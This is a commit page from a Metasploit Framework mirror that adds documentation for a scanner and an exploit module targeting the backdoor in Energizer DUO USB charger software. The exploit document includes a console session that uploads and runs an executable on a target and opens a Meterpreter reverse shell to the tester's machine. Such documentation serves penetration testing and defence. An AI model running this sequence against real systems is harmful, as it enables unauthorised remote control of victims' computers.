infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #8297, add docs for energizer duo scanner and exploit

bug/bundler_fix
Brent Cook 2017-05-08 17:14:36 -05:00
parent 86365c89d1 c4bb918cca
commit 96e3d61883
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 63 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
documentation/modules/auxiliary/scanner/backdoor/energizer_duo_detect.md Normal file
View File

@ -0,0 +1,27 @@
## Vulnerable Application
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: `use auxiliary/scanner/backdoor/energizer_duo_detect`
4. Do: `set rhosts`
5. Do: `run`
## Scenarios
A run against the backdoor
```
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
```

36
documentation/modules/exploit/windows/backdoor/energizer_duo_payload.md Normal file
View File

@ -0,0 +1,36 @@
## Vulnerable Application
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: `use exploit/windows/backdoor/energizer_duo_payload`
4. Do: `set rhost`
5. Do: `set payload`
6. Do: `exploit`
## Scenarios
A run against the backdoor
```
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit
[*] Started reverse handler on 192.168.0.228:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
meterpreter > getuid
Server username: XPDEV\Developer
```